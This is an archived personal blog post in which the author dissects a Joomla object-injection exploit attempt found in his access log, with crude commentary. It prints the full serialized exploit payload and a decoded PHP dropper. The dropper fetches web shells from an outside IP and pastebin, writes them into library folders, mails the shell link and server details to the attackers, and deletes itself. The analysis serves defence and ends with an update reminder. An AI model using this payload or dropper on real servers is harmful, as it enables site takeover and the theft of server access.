Content Notice!

This post is really old, and no longer reflect my skill level, views or opinions, it is made available here for archival purposes (it was originally on my old WordPress blog).

Keep that in mind when you read the contents within.

Reversing an attempted Joomla Vulnerability Attack

I looked through my access log a little while ago and found some script kiddy trying to attack my non-Joomla site with the latest and greatest Joomla exploit.

64.40.156.51 - - [11/Feb/2016:00:18:58 -0500] "GET / HTTP/1.1" 301 1147 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"000disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3950:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2WTNOekxuQm9jQ0lnT3cwS0pIUmxlSFFnUFNCb2RIUndYMmRsZENnbmFIUjBjRG92THpFMk5pNDJNaTR4TURJdU1qTXlMMzUzYjNKcmMzQmhZMlV2YkdsaUwyTnpjeTUwZUhRbktUc05DaVJ2Y0dWdUlEMGdabTl3Wlc0b0pHTm9aV05yTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0dWdUxDQWtkR1Y0ZENrN0RRcG1ZMnh2YzJVb0pHOXdaVzRwT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdOb1pXTnJLU2w3RFFvZ0lDQWdaV05vYnlBa1kyaGxZMnN1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE1pT3cwS1pXTm9ieUFpWkc5dVpTQXVYRzRnSWlBN0RRb2tZMmhsWTJzeUlEMGdKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxYldGcGJDNXdhSEFpSURzTkNpUjBaWGgwTWlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk1UWTJMall5TGpFd01pNHlNekl2Zm5kdmNtdHpjR0ZqWlM5c2FXSXZiUzUwZUhRbktUc05DaVJ2Y0dWdU1pQTlJR1p2Y0dWdUtDUmphR1ZqYXpJc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d1pXNHlMQ0FrZEdWNGRESXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdU1pazdEUXBwWmlobWFXeGxYMlY0YVhOMGN5Z2tZMmhsWTJzeUtTbDdEUW9nSUNBZ1pXTm9ieUFrWTJobFkyc3lMaUk4TDJKeVBpSTdEUXA5Wld4elpTQU5DaUFnWldOb2J5QWlibTkwSUdWNGFYUnpNaUk3RFFwbFkyaHZJQ0prYjI1bE1pQXVYRzRnSWlBN0RRb05DaVJqYUdWamF6TTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2WVM1b2RHMGlJRHNOQ2lSMFpYaDBNeUE5SUdoMGRIQmZaMlYwS0Nkb2RIUndPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTl1UW5OS2FGYzNPQ2NwT3cwS0pHOXdNejFtYjNCbGJpZ2tZMmhsWTJzekxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNETXNKSFJsZUhRektUc05DbVpqYkc5elpTZ2tiM0F6S1RzTkNnMEtKR05vWldOck5EMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMk5vWldOckxuQm9jQ0lnT3cwS0pIUmxlSFEwSUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4eE5qWXVOakl1TVRBeUxqSXpNaTkrZDI5eWEzTndZV05sTDJ4cFlpOWpMblI0ZENjcE93MEtKRzl3TkQxbWIzQmxiaWdrWTJobFkyczBMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFFzSkhSbGVIUTBLVHNOQ21aamJHOXpaU2drYjNBMEtUc05DZzBLSkdOb1pXTnJOVDBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNjeTV3YUhBaUlEc05DaVIwWlhoME5TQTlJR2gwZEhCZloyVjBLQ2RvZEhSd09pOHZNVFkyTGpZeUxqRXdNaTR5TXpJdmZuZHZjbXR6Y0dGalpTOXNhV0l2YlcwdWRIaDBKeWs3RFFva2IzQTFQV1p2Y0dWdUtDUmphR1ZqYXpVc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d05Td2tkR1Y0ZERVcE93MEtabU5zYjNObEtDUnZjRFVwT3cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMnhwWW5KaGNtbGxjeTlxYjI5dGJHRXZjMlZ6YzJsdmJpOXpaWE56YVc5dUxuQm9jQ0lnT3cwS0pIUmxlSFEySUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk5d1lYTjBaV0pwYmk1amIyMHZjbUYzTDFWSVFVZFVPRGczSnlrN0RRb2tiM0EyUFdadmNHVnVLQ1JqYUdWamF6WXNJQ2QzSnlrN0RRcG1kM0pwZEdVb0pHOXdOaXdrZEdWNGREWXBPdzBLWm1Oc2IzTmxLQ1J2Y0RZcE93MEtEUW9rZEc5NklEMGdJbVpsYjJabGIzbzBORE5BWjIxaGFXd3VZMjl0TENCbVpXOW1aVzk2TkRRelFHOTFkR3h2YjJzdVkyOXRJanNOQ2lSemRXSnFaV04wSUQwZ0owZHBablFnWm5KdmJTQkJUR1poSUVwdmJTQjZlbm9nSnlBdUlDUmZVMFZTVmtWU1d5ZFRSVkpXUlZKZlRrRk5SU2RkT3cwS0pHaGxZV1JsY2lBOUlDZG1jbTl0T2lCQmJHWmhZbVYwYjFacGNuUjFZV3dnTENCMGFHRnVhM01nVjJGc1pTQThabVZ2Wm1WdmVqUTBNMEJuYldGcGJDNWpiMjArSnlBdUlDSmNjbHh1SWpzTkNpUnRaWE56WVdkbElEMGdJbE5vWld4c2VpQTZJR2gwZEhBNkx5OGlJQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW0xaGFXd3VjR2h3UDNVaUlDNGdJbHh5WEc0aUlDNGdjR2h3WDNWdVlXMWxLQ2tnTGlBaVhISmNiaUk3RFFva2MyVnVkRzFoYVd3Z1BTQkFiV0ZwYkNna2RHOTZMQ0FrYzNWaWFtVmpkQ3dnSkcxbGMzTmhaMlVzSUNSb1pXRmtaWElwT3cwS0RRcEFkVzVzYVc1cktGOWZSa2xNUlY5ZktUc05DZzBLRFFvL1BnPT0nKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"000connection";b:1;}ðýýý"

Since I like to fuck about with stuff, I decided i'd look a little deeper into it, I know that the payload is Base64 encoded, so i used a base64 decode tool and it returned this:

$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzE2Ni42Mi4xMDIuMjMyL353b3Jrc3BhY2UvbGliL2Nzcy50eHQnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHAiIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwOi8vMTY2LjYyLjEwMi4yMzIvfndvcmtzcGFjZS9saWIvbS50eHQnKTsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzMiI7DQplY2hvICJkb25lMiAuXG4gIiA7DQoNCiRjaGVjazM9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvYS5odG0iIDsNCiR0ZXh0MyA9IGh0dHBfZ2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9uQnNKaFc3OCcpOw0KJG9wMz1mb3BlbigkY2hlY2szLCAndycpOw0KZndyaXRlKCRvcDMsJHRleHQzKTsNCmZjbG9zZSgkb3AzKTsNCg0KJGNoZWNrND0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2NoZWNrLnBocCIgOw0KJHRleHQ0ID0gaHR0cF9nZXQoJ2h0dHA6Ly8xNjYuNjIuMTAyLjIzMi9+d29ya3NwYWNlL2xpYi9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vMTY2LjYyLjEwMi4yMzIvfndvcmtzcGFjZS9saWIvbW0udHh0Jyk7DQokb3A1PWZvcGVuKCRjaGVjazUsICd3Jyk7DQpmd3JpdGUoJG9wNSwkdGV4dDUpOw0KZmNsb3NlKCRvcDUpOw0KDQokY2hlY2s2PSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvc2Vzc2lvbi9zZXNzaW9uLnBocCIgOw0KJHRleHQ2ID0gaHR0cF9nZXQoJ2h0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L1VIQUdUODg3Jyk7DQokb3A2PWZvcGVuKCRjaGVjazYsICd3Jyk7DQpmd3JpdGUoJG9wNiwkdGV4dDYpOw0KZmNsb3NlKCRvcDYpOw0KDQokdG96ID0gImZlb2Zlb3o0NDNAZ21haWwuY29tLCBmZW9mZW96NDQzQG91dGxvb2suY29tIjsNCiRzdWJqZWN0ID0gJ0dpZnQgZnJvbSBBTGZhIEpvbSB6enogJyAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddOw0KJGhlYWRlciA9ICdmcm9tOiBBbGZhYmV0b1ZpcnR1YWwgLCB0aGFua3MgV2FsZSA8ZmVvZmVvejQ0M0BnbWFpbC5jb20+JyAuICJcclxuIjsNCiRtZXNzYWdlID0gIlNoZWxseiA6IGh0dHA6Ly8iIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvam1haWwucGhwP3UiIC4gIlxyXG4iIC4gcGhwX3VuYW1lKCkgLiAiXHJcbiI7DQokc2VudG1haWwgPSBAbWFpbCgkdG96LCAkc3ViamVjdCwgJG1lc3NhZ2UsICRoZWFkZXIpOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCg0KDQo/Pg=='));
fclose($fp);

Which decodes some other base64 shit and writes it out to another file which results in the following code

<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://166.62.102.232/~workspace/lib/css.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  {echo "not exits";}
echo "done .n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://166.62.102.232/~workspace/lib/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  {echo "not exits2";}
echo "done2 .n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/a.htm" ;
$text3 = http_get('http://pastebin.com/raw/nBsJhW78');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://166.62.102.232/~workspace/lib/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://166.62.102.232/~workspace/lib/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "feofeoz443@gmail.com, feofeoz443@outlook.com";
$subject = 'Gift from ALfa Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: AlfabetoVirtual , thanks Wale <feofeoz443@gmail.com>' . "rn";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "rn" . php_uname() . "rn";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

?>

Now, I could spend my time talking about the poor code style, horrible variable names, suppression of errors by using @ in-front of functions and how some idiot decided to try to close the curl session after returning the result of the request...

Or I could not give a fuck and move on..

The script then tries to download some web shell code from 6 different locations and save it to a file, the sites hosting the shells are taken down now, but they were just hosting the generic WSO 2.5 shell anywas, standard stuff..

The script then sends an email to feofeoz443@gmail.com and feofeoz443@outlook.com with a link to the shell and a cute message, it is sent from the alias of "AlfabetoVirtual", which seems to be quite an active douchebag website-defacing-group on Zone-H, which is a "hey look i defaced this website trolololz" bragging site for little kids with nothing better to do.

The attack most likely originates from an automated scanner running on a Windows box, according to the Arins Whois lookup tool the IP range is assigned to Alentus which is a hosting company which seems to provide mainly Windows hosting services.

If you are reading this Alfabeto, come at me, braah :*

P.S If you have not yet updated your Joomla install, read this page.